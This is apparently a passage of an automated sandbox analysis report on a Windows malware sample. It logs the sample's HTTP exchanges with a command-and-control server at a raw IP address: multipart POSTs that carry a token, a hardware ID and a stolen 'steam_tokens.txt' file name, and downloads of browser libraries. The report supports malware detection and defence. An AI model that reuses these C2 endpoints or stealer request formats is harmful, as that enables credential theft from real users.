0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 2d 2d 0d 0a Data Ascii: ------KEHDBAEGIIIEBGCAAFHIContent-Disposition: form-data; name="token"9bb362b6f651ce4d1d9d7c98a3ecb9eae345205743a83eade3137f3df3c90d1cc2e8b0b3------KEHDBAEGIIIEBGCAAFHIContent-Disposition: form-data; name="message"ybncbhylepme------KEHDBAEGIIIEBGCAAFHI--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFIIEHJDBKJKECBFHDGHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 62 62 33 36 32 62 36 66 36 35 31 63 65 34 64 31 64 39 64 37 63 39 38 61 33 65 63 62 39 65 61 65 33 34 35 32 30 35 37 34 33 61 38 33 65 61 64 65 33 31 33 37 66 33 64 66 33 63 39 30 64 31 63 63 32 65 38 62 30 62 33 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 2d 2d 0d 0a Data Ascii: ------CBFIIEHJDBKJKECBFHDGContent-Disposition: form-data; name="token"9bb362b6f651ce4d1d9d7c98a3ecb9eae345205743a83eade3137f3df3c90d1cc2e8b0b3------CBFIIEHJDBKJKECBFHDGContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CBFIIEHJDBKJKECBFHDGContent-Disposition: form-data; name="file"------CBFIIEHJDBKJKECBFHDG--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFBGHCAKKFCAKEBKJKKHost: 185.215.113.37Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 62 62 33 36 32 62 36 66 36 35 31 63 65 34 64 31 64 39 64 37 63 39 38 61 33 65 63 62 39 65 61 65 33 34 35 32 30 35 37 34 33 61 38 33 65 61 64 65 33 31 33 37 66 33 64 66 33 63 39 30 64 31 63 63 32 65 38 62 30 62 33 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 2d 2d 0d 0a Data Ascii: ------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="token"9bb362b6f651ce4d1d9d7c98a3ecb9eae345205743a83eade3137f3df3c90d1cc2e8b0b3------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="message"files------DAFBGHCAKKFCAKEBKJKK--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKEGHJDHDAFHIDHCFHDHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 62 62 33 36 32 62 36 66 36 35 31 63 65 34 64 31 64 39 64 37 63 39 38 61 33 65 63 62 39 65 61 65 33 34 35 32 30 35 37 34 33 61 38 33 65 61 64 65 33 31 33 37 66 33 64 66 33 63 39 30 64 31 63 63 32 65 38 62 30 62 33 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 2d 2d 0d 0a Data Ascii: ------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="token"9bb362b6f651ce4d1d9d7c98a3ecb9eae345205743a83eade3137f3df3c90d1cc2e8b0b3------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="message"wkkjqaiaxkhb------AKKEGHJDHDAFHIDHCFHD--
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.37 185.215.113.37
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49730 -> 185.215.113.37:80
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00944880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 0_2_00944880
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: unknown HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEHCFIDHIDGIDHJEHIDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 43 46 49 44 48 49 44 47 49 44 48 4a 45 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 43 42 30 43 32 31 45 46 42 46 39 31 38 35 35 38 31 38 33 35 33 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 43 46 49 44 48 49 44 47 49 44 48 4a 45 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 43 46 49 44 48 49 44 47 49 44 48 4a 45 48 49 44 2d 2d 0d 0a Data Ascii: ------IIEHCFIDHIDGIDHJEHIDContent-Disposition: form-data; name="hwid"0CB0C21EFBF91855818353------IIEHCFIDHIDGIDHJEHIDContent-Disposition: form-data; name="build"save------IIEHCFIDHIDGIDHJEHID--
Source: file.exe, 00000000.00000002.1911292762.0000000000B0B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1910986531.00000000006CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1910986531.0000000000728000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1910986531.0000000000744000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll
Source: file.exe, 00000000.00000002.1910986531.0000000000744000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.1910986531.0000000000744000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll
Source: file.exe, 00000000.00000002.1910986531.0000000000744000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dlld
Source: file.exe, 00000000.00000002.1910986531.0000000000713000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.1910986531.0000000000744000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.1910986531.0000000000744000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.1910986531.00000000006CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dllA
Source: file.exe, 00000000.00000002.1910986531.0000000000744000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dllN
Source: file.exe, 00000000.00000002.1910986531.0000000000728000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.1910986531.0000000000728000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/NJ
Source: file.exe, 00000000.00000002.1910986531.0000000000744000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1910986531.0000000000744000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php3
Source: file.exe, 00000000.00000002.1910986531.00000000006CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php5k
Source: file.exe, 00000000.00000002.1910986531.0000000000728000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1910986531.0000000000744000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpD
Source: file.exe, 00000000.00000002.1910986531.0000000000744000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpFirefox
Source: file.exe, 00000000.00000002.1910986531.0000000000728000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpHDGDGHCBGCAKFIIIE
Source: file.exe, 00000000.00000002.1910986531.0000000000728000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpP
Source: file.exe, 00000000.00000002.1910986531.0000000000744000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpdll
Source: file.exe, 00000000.00000002.1910986531.0000000000744000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpo
Source: file.exe, 00000000.00000002.1910986531.0000000000744000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpser
Source: file.exe, 00000000.00000002.1911292762.0000000000B0B000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.1910986531.0000000000744000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpv
Source: file.exe, 00000000.00000002.1910986531.00000000006CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37e
Source: file.exe, 00000000.00000002.1911292762.0000000000B0B000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.37e2b1563c6670f193.phpfox
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, 00000000.00000002.1934333564.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.1926092694.000000001D335000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1933957749.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: HDAFBGIJ.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.1931054359.0000000029271000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1910986531.0000000000799000.00000004.00000020.00020000.00000000.sdmp, BKEHDGDGHCBGCAKFIIIE.0.dr String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: file.exe, 00000000.00000002.1931054359.0000000029271000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1910986531.0000000000799000.00000004.00000020.00020000.00000000.sdmp, BKEHDGDGHCBGCAKFIIIE.0.dr String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: HDAFBGIJ.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: HDAFBGIJ.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: HDAFBGIJ.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.1931054359.0000000029271000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1910986531.0000000000799000.00000004.00000020.00020000.00000000.sdmp, BKEHDGDGHCBGCAKFIIIE.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: file.exe, 00000000.00000002.1931054359.0000000029271000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1910986531.0000000000799000.00000004.00000020.00020000.00000000.sdmp, BKEHDGDGHCBGCAKFIIIE.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: HDAFBGIJ.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: HDAFBGIJ.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: HDAFBGIJ.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: BKEHDGDGHCBGCAKFIIIE.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: JJEGIJEGDBFHDGCAFCAEBGCGCB.0.dr String found in binary or memory: https://support.mozilla.org
Source: JJEGIJEGDBFHDGCAFCAEBGCGCB.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: JJEGIJEGDBFHDGCAFCAEBGCGCB.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: file.exe, file.exe, 00000000.00000002.1911292762.0000000000941000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1767858500.000000001D23C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1911292762.000000000099A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: file.exe, 00000000.00000002.1911292762.0000000000941000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1911292762.000000000099A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY
Source: file.exe, 00000000.00000002.1911292762.0000000000941000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
Source: file.exe, 00000000.00000003.1767858500.000000001D23C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1911292762.000000000099A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: file.exe, 00000000.00000002.1911292762.000000000099A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Visual
Source: file.exe, 00000000.00000002.1911292762.000000000099A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF
Source: file.exe, 00000000.00000002.1911292762.000000000099A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm
